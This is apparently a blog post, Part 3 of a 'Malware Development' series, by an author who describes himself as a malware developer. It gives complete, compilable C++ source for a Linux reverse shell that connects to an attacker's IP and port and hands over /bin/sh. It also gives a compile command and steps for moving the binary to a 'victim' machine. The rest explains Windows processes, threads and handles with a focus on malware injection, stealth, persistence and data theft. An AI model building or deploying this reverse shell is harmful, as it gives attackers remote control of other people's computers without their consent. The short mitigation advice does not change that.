Malware Development : Part 3

RED TEAM
9 min readMar 23, 2024

--

“Mastering Malware: A Journey Through Development Techniques”

Hey everyone,

In Part 2, we learned an important topic: Reverse Shell, and explored various methods to create one.

Let’s dive into Part 3 we learnt to:

  1. Create reverse shell in C++ .
  2. Concept of Processes , Threads and Handles in the context of Malware Development. (Most Important)
  3. Classic code injection into the process, simple C++ malware.

1. Create Reverse Shell in C++

I like to tinker with stuff, especially in cybersecurity. Since I started out in programming, I sometimes enjoy redoing things from scratch. It helps me grasp concepts better as I continue learning. As mentioned before, we’re going to create a reverse shell that works on Linux (target computer).

Create file reverse_shell.cpp:

#include <iostream>
#include <cstdlib>
#include <cstring>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main() {
const char* ip = "192.168.1.11";
int port = 4444;

// Address structure
sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_aton(ip, &addr.sin_addr);

// Socket creation
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("Socket creation failed");
exit(EXIT_FAILURE);
}

// Connect to attacker's machine
if (connect(sockfd, reinterpret_cast<sockaddr*>(&addr), sizeof(addr)) < 0) {
perror("Connection failed");
exit(EXIT_FAILURE);
}

// Redirect standard input, output, and error to the socket
for (int i = 0; i < 3; i++) {
if (dup2(sockfd, i) < 0) {
perror("dup2 failed");
exit(EXIT_FAILURE);
}
}

// Execute shell
char *const argv[] = {const_cast<char*>("/bin/sh"), nullptr};
if (execve("/bin/sh", argv, nullptr) < 0) {
perror("execve failed");
exit(EXIT_FAILURE);
}

return 0;
}

NOTE : Remember to replace the IP in the code.

Let’s compile this:

g++ -o reverse_shell reverse_shell.cpp -static-libgcc -static-libstdc++

Let’s go to transfer file to victim’s machine. File transfer is considered to be one of the most important steps involved in post exploitation (as I wrote earlier, we do not consider exploitation step). We will use the tool that is known as the Swiss knife of the hacker, netcat.

On victim machine run:

On attacker machine run:

check:

mitigation:

Unfortunately, there is no way to completely block reverse shells. Unless you are deliberately using reverse shells for remote administration, any reverse shell connections are likely to be malicious. To limit exploitation, you can lock down outgoing connectivity to allow only specific remote IP addresses and ports for the required services. This might be achieved by sandboxing or running the server in a minimal container.

2. Concept of Processes , Threads and Handles

In the Windows operating system, processes, threads, and handles serve essential roles in managing the execution of programs and system operations:

Processes:

In Windows, a processes represents a running instance of a program. Each processes has its own memory space, resources, and execution environment. Processes in Windows are crucial for multitasking and managing system resources efficiently.

Processes serve as the execution environment for malicious code. When a malware executable is run, it typically creates its own process to carry out its activities independently from other programs on the system. This isolation helps the malware evade detection and interference from security software.

They allow multiple programs to run concurrently without interfering with each other. For example, when you open a web browser, a processes is created to manage its execution. Malware in Windows often operates within its own processes to carry out malicious activities while attempting to evade detection and interference from other processes.

Let’s simplify:

  1. Processes :
  • Use: Processes are like containers for running programs on your computer. Each processes has its own space to run, including memory and resources.
  • Work: When you open a program, like a web browser or a game, it starts as a processes. Processes help keep programs separate from each other, so they don’t interfere or crash each other.

Demonstrates the basic concept of creating and managing processes in Windows though the simple C++ code :

This code demonstrates the following steps:

  1. Include Necessary Headers: windows.h header is included to access Windows API functions.
  2. Define Structures: PROCESS_INFORMATION and STARTUPINFO structures are defined to hold information about the newly created process and its startup configuration, respectively.
  3. Initialize Startup Information: The STARTUPINFO structure is initialized using ZeroMemory() and by setting the cb member to the size of the structure.
  4. Specify Command to Execute: The command to be executed is specified in the command variable. In this case, it's notepad.exe, which opens the Notepad application.
  5. Create Process: CreateProcess() function is called to create a new process. It takes parameters such as the command line, process attributes, thread attributes, etc.
  6. Check for Process Creation: If CreateProcess() fails, an error message is printed with the error code obtained from GetLastError().
  7. Wait for Process to Finish: WaitForSingleObject() is called to wait for the created process to finish executing.
  8. Close Handles: Finally, the handles to the process and thread are closed using CloseHandle() to release system resources.

When you run this program, it will create a new instance of Notepad (notepad.exe). The program will wait until Notepad is closed, and then it will terminate. This demonstrates the basic working of process creation and management in a Windows environment using C++.

Understand the Processes concept in the context of Malware Developing

Processes:

  • Creation: Malware often creates its own processes upon execution to run its malicious code. This helps isolate the malware from the rest of the system and avoid interference from security software.
  • Injection: Inject code into legitimate processes to hide its presence and evade detection. By injecting malicious code into trusted processes, the malware can camouflage its activities and maintain persistence on the infected system.
  • Inter-Processes Communication (IPC): Processes can communicate with each other using various IPC mechanisms such as shared memory, pipes, or sockets. Malware use IPC to coordinate activities between different components or to relay commands and data to remote servers.

Processes play a crucial role in malware development by providing the execution environment, resource management capabilities, persistence mechanisms, and stealth necessary for malicious code to operate effectively on infected systems while evading detection

Threads :

Threads are the smallest unit of execution within a process. Threads are like small workers within a process. Imagine a process as a big factory, and threads are individual workers inside that factory. A thread represents a single sequence of instructions that can be executed independently. Threads within a process share the same memory space and resources, allowing them to communicate and cooperate with each other efficiently.

In Windows, threads are essential for achieving concurrency and responsiveness in applications. Malware often utilizes threads to perform multiple tasks simultaneously, such as monitoring system activities, communicating with remote servers, or executing malicious code payloads.

Let’s simplify

Threads:

  • Use: Threads are like tasks assigned to employees within a workstation. They do different things at the same time within a process.
  • Work: Threads allow programs to multitask. Malware uses threads to do multiple things at once, like stealing data while pretending to be innocent.

Understand through Diagram

Understand through the Code

This code demonstrates how to create and manage threads in a Windows environment using the Windows API. Each thread is responsible for downloading a single file concurrently, improving the overall performance of the file downloader application.

Explanation:

  1. Windows-specific Headers: We include <Windows.h>, which provides access to Windows API functions for threading.
  2. Thread Entry Function: The downloadFile function is defined with the return type DWORD WINAPI, which is required for Windows thread entry points. It takes a LPVOID parameter (lpParam), which we cast to a std::string* to obtain the URL of the file to download.
  3. Main Function:
  • We define a vector fileUrls containing URLs of files to be downloaded concurrently.
  • We create a vector threads to store handles of the threads we'll create.
  • Inside the loop, we call CreateThread to create a thread for each file download. The parameters are NULL for default security attributes, 0 for default stack size, the downloadFile function as the thread entry point, a pointer to the URL string as the thread parameter, 0 for creation flags, and NULL for thread identifier (which we don't use). The function returns a handle to the created thread.
  • We check if thread creation was successful. If so, we store the thread handle in the threads vector for later synchronization.

4. Thread Synchronization:

  • We use WaitForMultipleObjects to wait for all threads to finish. The parameters are the number of objects to wait for (which is the size of the threads vector), an array of object handles (threads.data()), TRUE to wait for all objects to signal, and INFINITE to wait indefinitely until all threads complete.

5. Output:

  • The main function outputs a message indicating that all files have been downloaded successfully.

This code demonstrates how to create and manage threads in a Windows environment using the Windows API. Each thread is responsible for downloading a single file concurrently, improving the overall performance of the file downloader application.

Understand the Threads concept in the context of Malware Developing

  • Concurrency: Malware utilizes threads to perform multiple tasks simultaneously, such as monitoring system activities, capturing user input, or communicating with external servers. By leveraging threads, malware can achieve greater efficiency and responsiveness in carrying out its malicious objectives.
  • Stealth: Threads can be used by malware to perform stealthy operations, such as hooking system functions or intercepting network traffic, without disrupting the normal operation of the system or raising suspicion.
  • Resource Management: Threads allow malware to efficiently manage system resources, such as CPU and memory, to ensure optimal performance while avoiding detection by security software.

Handles

In simple terms, handles in Windows are like keys that allow programs (including malware) to access different parts of the operating system, such as files, programs, and system settings. Malware uses handles to perform tasks like reading or modifying files, controlling other programs, altering system configurations, and communicating over networks. Handles are essential for malware to carry out its malicious activities on a Windows computer.

Let’s simplify

Handles:

  • Use: Handles are like tickets that programs use to access system resources, like files or memory.
  • Work: When a program needs to use something from the computer, like open a file or connect to the internet, it gets a handle. The handle lets the program access and control that resource.

Understand through Diagram

Understand the concept of Handles in the Context of Malware.

  1. Resource Access: Malware acquires handles to system resources (files, processes, registry keys) to read, write, or execute malicious code, facilitating unauthorized access.
  2. Persistence: Handles enable malware to maintain a presence on the system by keeping references to malicious files or processes even after initial execution.
  3. Data Theft: Handles are used by malware to access and extract sensitive information stored in files, memory, or other system resources.
  4. Inter-Process Communication (IPC): Malware can utilize handles for IPC to communicate with other processes, potentially spreading infection or executing commands.
  5. Stealth: Malware may manipulate handles to hide its presence or activities from security monitoring tools or users, making detection and removal more challenging.

I hope you understand the concepts of Processes, Threads, and Handles and Creating a reverse shell in C++.

In this Part 3, I covered two topics from three : creating a reverse shell in C++ and the concept of Processes, Threads, and Handles.

The third topic, Classic code injection into a process, using simple C++ malware, will be covered in the next Part 3.

RED TEAM

--

--

RED TEAM
RED TEAM

Written by RED TEAM

I'm a 19-year-old malware developer with 1 year of experience. Passionate about learning new techniques, sharing knowledge, and creating malware tools.

No responses yet